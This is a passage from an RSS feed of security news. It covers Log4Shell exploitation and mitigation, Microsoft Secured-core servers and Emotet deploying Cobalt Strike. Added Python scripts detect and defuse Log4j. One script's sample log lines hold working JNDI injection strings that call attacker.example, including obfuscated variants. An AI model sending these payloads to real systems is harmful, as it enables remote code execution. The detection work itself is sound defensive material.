	Additionally, CERT NZ (New Zealand's national Computer Emergency Response Team) has issued a security advisory warning of <a href="https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/" rel="external nofollow" target="_blank">active exploitation in the wild</a> (also confirmed by <a href="https://twitter.com/balgan/status/1469298678963834892?s=12" rel="external nofollow" target="_blank">Coalition Director Of Engineering - Security Tiago Henriques</a> and <a href="http://twitter.com/GossiTheDog/status/1469291340961832961" rel="external nofollow" target="_blank">security expert Kevin Beaumont</a>).
</p>

<p>
	 
</p>

<p>
	Nextron Systems' Head of Research Florian Roth has <a href="https://twitter.com/cyb3rops/status/1469243580929740802" rel="external nofollow" target="_blank">shared</a> a set of YARA rules for <a href="https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b" rel="external nofollow" target="_blank">detecting CVE-2021-44228 exploitation attempts</a>.
</p>
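<p>
	The rules above match exploitation attempts in captured traffic; the same idea applies to web server logs, where the attacker's lookup string lands in the User-Agent, query string or other logged field. The following is an added example, not code from the article or from Nextron's YARA set: a small Python scanner that URL-decodes each line, collapses the nested lookups attackers use to hide the letters of "jndi" (such as ${lower:j} and the ${::-j} default-value form), and then matches the ${jndi:scheme:target} pattern. The log lines are constructed for the demonstration and the attacker hostnames are placeholders.
</p>

```python
"""Flag Log4Shell probe strings in web server logs, including common obfuscations.

Added example: a plain regex-based scanner, not the YARA rules from the article.
The sample log lines are constructed, not taken from a real incident.
"""
import re
import sys
from urllib.parse import unquote

# Constructed sample access-log lines; the last two are benign (one even contains a
# harmless ${HOME} lookup that must not be flagged).
SAMPLE_LOG_LINES = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.8 - - [10/Dec/2021:14:02:12 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://attacker.example/b} HTTP/1.1" 200 77 "-" "curl/7.68.0"',
    '198.51.100.9 - - [10/Dec/2021:14:02:13 +0000] "GET /api HTTP/1.1" 404 0 "-" "%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fc%7D"',
    '198.51.100.10 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/d} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:02:15 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:14:02:16 +0000] "POST /search?q=${HOME} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# Inner lookups wrapped around single letters to defeat a naive "${jndi:" match:
#   ${lower:j} / ${upper:J}   -> the wrapped text (case is irrelevant to the final match)
#   ${::-j}, ${env:NOPE:-j}   -> the default value after ":-"
_INNER_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"
    r"|\$\{[^${}]*:-([^${}]*)\}",
    re.IGNORECASE,
)
# ${jndi:<scheme>:[//]<target>} after normalization.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^}\s]*)", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL encoding and collapse nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        collapsed = _INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), decoded)
        if collapsed == text:
            return text
        text = collapsed
    return text


def scan_log(lines):
    """Return one finding per log line that carries a JNDI lookup after normalization."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        match = _JNDI.search(normalize(raw))
        if match:
            findings.append({
                "line": number,
                "source_ip": raw.split(" ", 1)[0],   # first field of a combined-format line
                "scheme": match.group(1).lower(),
                "target": match.group(2),
                "raw": raw,
            })
    return findings


if __name__ == "__main__":
    # Pass "-" to read a real log from stdin; otherwise scan the constructed sample.
    lines = [l.rstrip("\n") for l in sys.stdin] if sys.argv[1:] == ["-"] else SAMPLE_LOG_LINES
    for hit in scan_log(lines):
        print(f'line {hit["line"]}: {hit["source_ip"]} -> {hit["scheme"]}://{hit["target"]}')
```

Run against the sample, the scanner flags lines 1 to 4 and leaves the two benign requests alone; the callback hosts it extracts (the "target" field) are what you would feed into egress-traffic and DNS searches to tell probing from a callback that actually completed.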

<p>
	 
</p>

<div class="ipsEmbeddedOther" contenteditable="false">
	<iframe allowfullscreen="" class="ipsEmbed_finishedLoading" data-controller="core.front.core.autosizeiframe" data-embedid="embed7579788624" scrolling="no" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://twitter.com/bad_packets/status/1469225135504650240?ref_src=twsrc%255Etfw%257Ctwcamp%255Etweetembed%257Ctwterm%255E1469225135504650240%257Ctwgr%255E%257Ctwcon%255Es1_%26ref_url=https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/" style="overflow: hidden; height: 562px;"></iframe>
</div>

<h2>
	Patch and mitigation available
</h2>

<p>
	Apache has released <a href="https://logging.apache.org/log4j/2.x/download.html" rel="external nofollow" target="_blank">Log4j 2.15.0</a> to address the maximum severity CVE-2021-44228 RCE vulnerability.
</p>

<p>
	 
</p>

<p>
	Where an immediate upgrade is not possible, the flaw can also be mitigated in affected releases. On Log4j 2.10 and later, set the system property "log4j2.formatMsgNoLookups" to "true" (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to "true"), which disables message lookups. On any affected 2.x release, the JndiLookup class can be removed from the log4j-core jar on the classpath, so that a "${jndi:...}" string has nothing to resolve it. Both are stopgaps; upgrading remains the fix.
</p>
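<p>
	The class-removal mitigation above is what Apache's advisory expresses as <code>zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</code>. The following is an added example, not Apache tooling or code from the article: a Python script that identifies log4j-core archives by their Maven pom.properties, reports the version and whether JndiLookup.class is still present, descends into nested JARs inside WAR/EAR/fat-JAR files (where the library usually hides in practice), and can write a copy with the class stripped. The archives it builds for demonstration are constructed stand-ins, not real log4j bytecode; the 2.15.0 threshold is the fixed version named in the article.
</p>

```python
"""Locate log4j-core archives that still ship JndiLookup and defuse them by removing the class.

Added example, not Apache tooling. Sample archives are constructed in memory; the
"class" they contain is a placeholder, not real bytecode.
"""
import io
import re
import sys
import zipfile
from pathlib import Path

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)            # first release carrying the fix, per the article
NESTED_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None when unparseable."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", text.strip())
    if not m:
        return None
    parts = [int(p) for p in m.groups() if p is not None]
    return tuple(parts + [0] * (3 - len(parts)))


def inspect_archive(data, name):
    """Findings for one archive plus any JAR/WAR/EAR nested inside it (fat JARs, web apps)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings                   # not a zip container: nothing to inspect
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:       # only log4j-core itself carries this file
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_lookup = JNDI_LOOKUP_CLASS in names
        if has_lookup or version is not None:
            parsed = parse_version(version) if version else None
            # Conservative: a build that still ships JndiLookup and is older than 2.15.0
            # (or whose version cannot be read) is treated as vulnerable.
            vulnerable = has_lookup and (parsed is None or parsed < FIXED_VERSION)
            findings.append({"archive": name, "version": version,
                             "has_jndi_lookup": has_lookup, "vulnerable": vulnerable})
        for entry in sorted(names):       # recurse into bundled archives
            if entry.lower().endswith(NESTED_SUFFIXES):
                findings.extend(inspect_archive(zf.read(entry), f"{name}!{entry}"))
    return findings


def strip_jndi_lookup(data):
    """Return a copy of the archive without JndiLookup.class (top-level archive only)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as zin, zipfile.ZipFile(out, "w") as zout:
        for item in zin.infolist():
            if item.filename != JNDI_LOOKUP_CLASS:
                zout.writestr(item, zin.read(item.filename))
    return out.getvalue()


def build_archive(entries):
    """Constructed test archive from a {name: bytes} mapping."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in entries.items():
            zf.writestr(name, payload)
    return out.getvalue()


def build_sample_jar(version, include_lookup=True):
    """Constructed stand-in for a log4j-core JAR of the given version."""
    entries = {POM_PROPERTIES: f"version={version}\nartifactId=log4j-core\n".encode()}
    if include_lookup:
        entries[JNDI_LOOKUP_CLASS] = b"\xca\xfe\xba\xbe placeholder, not real bytecode"
    return build_archive(entries)


if __name__ == "__main__":
    # Usage: python log4j_check.py /path/to/deployments
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in NESTED_SUFFIXES:
            for f in inspect_archive(path.read_bytes(), str(path)):
                status = "VULNERABLE" if f["vulnerable"] else "ok"
                print(f'{status:10} {f["archive"]} version={f["version"]} jndi_lookup={f["has_jndi_lookup"]}')
```

Note that a stripped copy is only useful if the application is restarted against it, and that a nested archive has to be unpacked, stripped and repacked; the function deliberately only rewrites the container it is handed.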

<p>
	 
</p>

<p>
	Those using the library are advised to upgrade to the latest release as soon as possible, since attackers are already searching for exploitable targets.
</p>

<p>
	 
</p>

<p>
	"Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come," the Randori Attack Team <a href="https://www.randori.com/blog/cve-2021-44228/" rel="external nofollow" target="_blank">said</a> today.
</p>

<p>
	 
</p>

<p>
	"Due to the ease of exploitation and the breadth of applicability, we suspect ransomware actors to begin leveraging this vulnerability immediately."
</p>

<p>
	 
</p>

<p>
	Security company LunaSec also underscored the severity of attacks using CVE-2021-44228 RCE exploits.
</p>

<p>
	 
</p>

<p>
	"Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable," Lunasec <a href="https://www.lunasec.io/docs/blog/log4j-zero-day/" rel="external nofollow" target="_blank">said</a>.
</p>

<p>
	 
</p>

<p>
	"Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach."
</p>

<p>
	 
</p>

<hr>
<p>
	 
</p>

<p>
	Update December 10, 11:46 EST: Cloudflare told BleepingComputer that its systems are not vulnerable to CVE-2021-44228 exploitation attempts.
</p>

<p>
	 
</p>

<p>
	"We responded quickly to evaluate all potential areas of risk and updated our software to prevent attacks, and have not been able to replicate any external claims that we might be at risk," said Leigh Ann Acosta, Cloudflare's Director of Public Relations.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/" rel="external nofollow">New zero-day exploit for Log4j Java library is an enterprise nightmare</a>
</p>
]]></description><guid isPermaLink="false">3612</guid><pubDate>Fri, 10 Dec 2021 22:32:32 +0000</pubDate></item><item><title>Microsoft: Secured-core servers help prevent ransomware attacks</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-secured-core-servers-help-prevent-ransomware-attacks-r3595/</link><description><![CDATA[<p>
	Microsoft says the first Secured-core certified Windows Server and Microsoft Azure Stack HCI devices are now available to protect customers' networks from security threats, including ransomware attacks.
</p>

<p>
	 
</p>

<p>
	Secured-core devices are marketed as a solution to the increasing number of firmware vulnerabilities attackers can exploit to bypass a Windows machine's Secure Boot, and to the lack of firmware-level visibility in today's endpoint security solutions.
</p>

<p>
	 
</p>

<p>
	All <a href="https://www.bleepingcomputer.com/news/security/windows-10-secured-core-pcs-can-block-driver-abusing-malware/" target="_blank" rel="external nofollow">Secured-core devices</a> have shipped with built-in protection against threats that abuse firmware and driver security flaws since <a href="https://www.bleepingcomputer.com/news/security/new-windows-10-secured-core-pcs-block-firmware-level-attacks/" target="_blank" rel="external nofollow">October 2019</a>. They can help defend against malware designed to take advantage of driver security flaws to disable security solutions.
</p>

<h2>
	Credential theft blocking capabilities
</h2>

<p>
	The newly certified Secured-core servers use <a href="https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-secure-boot" rel="external nofollow" target="_blank">Secure boot</a> and the <a href="https://docs.microsoft.com/en-us/windows/security/information-protection/tpm/trusted-platform-module-top-node" rel="external nofollow" target="_blank">Trusted Platform Module</a> 2.0 to ensure that only trusted firmware and boot components are allowed to load at boot.
</p>

<p>
	 
</p>

<p>
	They also leverage <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-system-guard/how-hardware-based-root-of-trust-helps-protect-windows#secure-launchthe-dynamic-root-of-trust-for-measurement-drtm" rel="external nofollow" target="_blank">Dynamic Root of Trust Measurement</a> (DRTM) to launch the operating system into a trusted state, blocking malware attempts to tamper with the system.
</p>

<p>
	 
</p>

<p>
	Secured-core servers also use <a href="https://techcommunity.microsoft.com/t5/windows-insider-program/virtualization-based-security-vbs-and-hypervisor-enforced-code/m-p/240571" rel="external nofollow" target="_blank">Hypervisor-Protected Code Integrity</a> (HVCI) to block all executables and drivers (such as Mimikatz) not signed by known and approved authorities from launching.
</p>

<p>
	 
</p>

<p>
	"Additionally, since <a href="https://techcommunity.microsoft.com/t5/windows-insider-program/virtualization-based-security-vbs-and-hypervisor-enforced-code/m-p/240571" rel="external nofollow" target="_blank">Virtualization-based security</a> (VBS) is enabled out of the box, IT administrators can easily enable features, such as <a href="https://techcommunity.microsoft.com/t5/windows-it-pro-blog/comprehensive-protection-for-your-credentials-with-credential/ba-p/765314" rel="external nofollow" target="_blank">Credential Guard</a>, which safeguard the credentials in an isolated environment that is invisible to attackers," Microsoft said.
</p>

<p>
	 
</p>

<p>
	By blocking credential theft attempts, Secured-core servers can help make it much harder for threat actors (including ransomware gangs such as REvil) to move laterally through the network, thus stopping their attacks before they can gain persistence and deploy their payloads.
</p>

<p>
	 
</p>

<p>
	For instance, Secured-core servers would have stopped RobbinHood Ransomware operators from <a href="https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/" target="_blank" rel="external nofollow">exploiting a vulnerable GIGABYTE driver</a> to elevate privileges and install malicious unsigned Windows drivers.
</p>

<p>
	 
</p>

<p>
	This made it possible to terminate antivirus and security software processes on compromised systems to bypass anti-ransomware defenses and deploy their payloads across the victim's network.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="REvil-ransomware-attack-flow.jpg" class="ipsImage" data-ratio="75.10" height="540" width="483" src="https://www.bleepstatic.com/images/news/u/1109292/2021/REvil-ransomware-attack-flow.jpg">
		</p>

		<figcaption>
			REvil ransomware attack flow (Microsoft)
		</figcaption>
	</figure>
</div>

<h2>
	Servers running Azure Stack HCI and Windows Server
</h2>

<p>
	Dozens of models with Secured-core server functionality are now available in the <a href="https://hcicatalog.azurewebsites.net/#/catalog?FeatureSupported=securedCoreServer" rel="external nofollow" target="_blank">Azure Stack HCI catalog</a> and the <a href="https://www.windowsservercatalog.com/results.aspx?&amp;bCatID=1333&amp;cpID=0&amp;avc=10&amp;ava=0&amp;avt=0&amp;avq=140&amp;OR=1&amp;PGS=25&amp;PG=1" rel="external nofollow" target="_blank">Windows Server Catalog</a> lists.
</p>

<p>
	 
</p>

<p>
	You can manage the servers' configuration and status together with all Windows clients on the network through the locally deployed and browser-based Windows Admin Center app.
</p>

<p>
	 
</p>

<p>
	"The Windows Admin Center UI allows you to easily configure the six features that encompass Secured-core server: Hypervisor Enforced Code Integrity, Boot Direct Memory Access (DMA) Protection, System Guard, Secure Boot, Virtualization-based security, and Trusted Platform Module 2.0," Microsoft <a href="https://www.microsoft.com/security/blog/2021/12/07/new-Secured-core-servers-are-now-available-from-the-microsoft-ecosystem-to-help-secure-your-infrastructure/" rel="external nofollow" target="_blank">added</a>.
</p>

<p>
	 
</p>

<p>
	Redmond first announced that <a href="https://www.bleepingcomputer.com/news/security/microsoft-announces-windows-server-2022-with-new-security-features/" target="_blank" rel="external nofollow">Windows Server 2022 will expand Secured-core</a> to the Windows Server platform when the new release entered preview in March.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-secured-core-servers-help-prevent-ransomware-attacks/" rel="external nofollow">Microsoft: Secured-core servers help prevent ransomware attacks</a>
</p>
]]></description><guid isPermaLink="false">3595</guid><pubDate>Wed, 08 Dec 2021 22:24:03 +0000</pubDate></item><item><title>Emotet now drops Cobalt Strike, fast forwards ransomware attacks</title><link>https://nsaneforums.com/news/security-privacy-news/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks-r3589/</link><description><![CDATA[<p>
	In a concerning development, the notorious Emotet malware now installs Cobalt Strike beacons directly, giving immediate network access to threat actors and making ransomware attacks imminent.
</p>

<p>
	 
</p>

<p>
	Emotet is a malware infection that spreads through spam emails containing malicious Word or Excel documents. These documents utilize macros to download and install the Emotet Trojan on a victim's computer, which is then used to steal email and deploy further malware on the device.
</p>

<p>
	 
</p>

<p>
	Historically, Emotet would install the TrickBot or Qbot trojans on infected devices. These Trojans would eventually deploy Cobalt Strike on an infected device or perform other malicious behavior.
</p>

<p>
	 
</p>

<p>
	Cobalt Strike is a legitimate penetration testing toolkit that allows attackers to deploy "beacons" on compromised devices to perform remote network surveillance or execute further commands.
</p>

<p>
	 
</p>

<p>
	However, Cobalt Strike is very popular among threat actors who use cracked versions as part of their network breaches and is commonly used in ransomware attacks.
</p>

<h2>
	Emotet changes its tactics
</h2>

<p>
	Today, Emotet research group <a href="https://twitter.com/Cryptolaemus1" rel="external nofollow" target="_blank">Cryptolaemus</a> warned that Emotet is now skipping their primary malware payload of TrickBot or Qbot and directly installing Cobalt Strike beacons on infected devices.
</p>

<p>
	 
</p>

<div class="ipsEmbeddedOther" contenteditable="false">
	<iframe allowfullscreen="" class="ipsEmbed_finishedLoading" data-controller="core.front.core.autosizeiframe" data-embedid="embed6730347881" scrolling="no" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://twitter.com/Cryptolaemus1/status/1468266929014157316?ref_src=twsrc%255Etfw%257Ctwcamp%255Etweetembed%257Ctwterm%255E1468266929014157316%257Ctwgr%255E%257Ctwcon%255Es1_%26ref_url=https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/" style="overflow: hidden; height: 455px;"></iframe>
</div>

<p>
	 
</p>

<p>
	A Flash Alert shared with BleepingComputer by email security firm Cofense explained that a limited number of Emotet infections installed Cobalt Strike, which attempted to contact a remote domain and was then uninstalled.
</p>

<p>
	 
</p>

<p>
	"Today, some infected computers received a command to install Cobalt Strike, a popular post-exploitation tool," warns the Cofense Flash Alert.
</p>

<p>
	 
</p>

<p>
	"Emotet itself gathers a limited amount of information about an infected machine, but Cobalt Strike can be used to evaluate a broader network or domain, potentially looking for suitable victims for further infection such as ransomware."
</p>

<p>
	 
</p>

<p>
	"While the Cobalt Strike sample was running, it attempted to contact the domain lartmana[.]com. Shortly afterward, Emotet uninstalled the Cobalt Strike executable."
</p>

<p>
	 
</p>

<p>
	This is a significant change in tactics: previously, after Emotet installed its primary payload of TrickBot or Qbot, victims typically had some time to detect the infection before Cobalt Strike was deployed.
</p>

<p>
	 
</p>

<p>
	Now that these initial malware payloads are skipped, threat actors will have immediate access to a network to spread laterally, steal data, and quickly deploy ransomware.
</p>

<p>
	 
</p>

<p>
	"This is a big deal. Typically Emotet dropped TrickBot or QakBot, which in turn dropped CobaltStrike. You'd usually have about a month between first infection and ransomware. With Emotet dropping CS directly, there's likely to be a much much shorter delay," security researcher Marcus Hutchins <a href="https://twitter.com/MalwareTechBlog/status/1468305592296951808" rel="external nofollow" target="_blank">tweeted</a> about the development.
</p>

<p>
	 
</p>

<p>
	This rapid deployment of Cobalt Strike will likely speed up ransomware deployment on compromised networks. This is especially true for the Conti ransomware gang who <a href="https://www.bleepingcomputer.com/news/security/emotet-botnet-comeback-orchestrated-by-conti-ransomware-gang/" target="_blank" rel="external nofollow">convinced the Emotet operators to relaunch</a> after they were <a href="https://www.bleepingcomputer.com/news/security/emotet-botnet-disrupted-after-global-takedown-operation/" target="_blank" rel="external nofollow">shut down by law enforcement</a> in January.
</p>

<p>
	 
</p>

<p>
	Cofense says that it is unclear if this is a test, being used by Emotet for their own network surveillance, or is part of an attack chain for other malware families that partner with the botnet.
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	"We don’t know yet whether the Emotet operators intend to gather data for their own use, or if this is part of an attack chain belonging to one of the other malware families. Considering the quick removal, it might have been a test, or even unintentional." - Cofense.
</p>

<p>
	 
</p>

<p>
	Researchers will closely monitor this new development, and as further information becomes available, we will update this article.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/" rel="external nofollow">Emotet now drops Cobalt Strike, fast forwards ransomware attacks</a>
</p>
]]></description><guid isPermaLink="false">3589</guid><pubDate>Wed, 08 Dec 2021 09:40:03 +0000</pubDate></item></channel></rss>
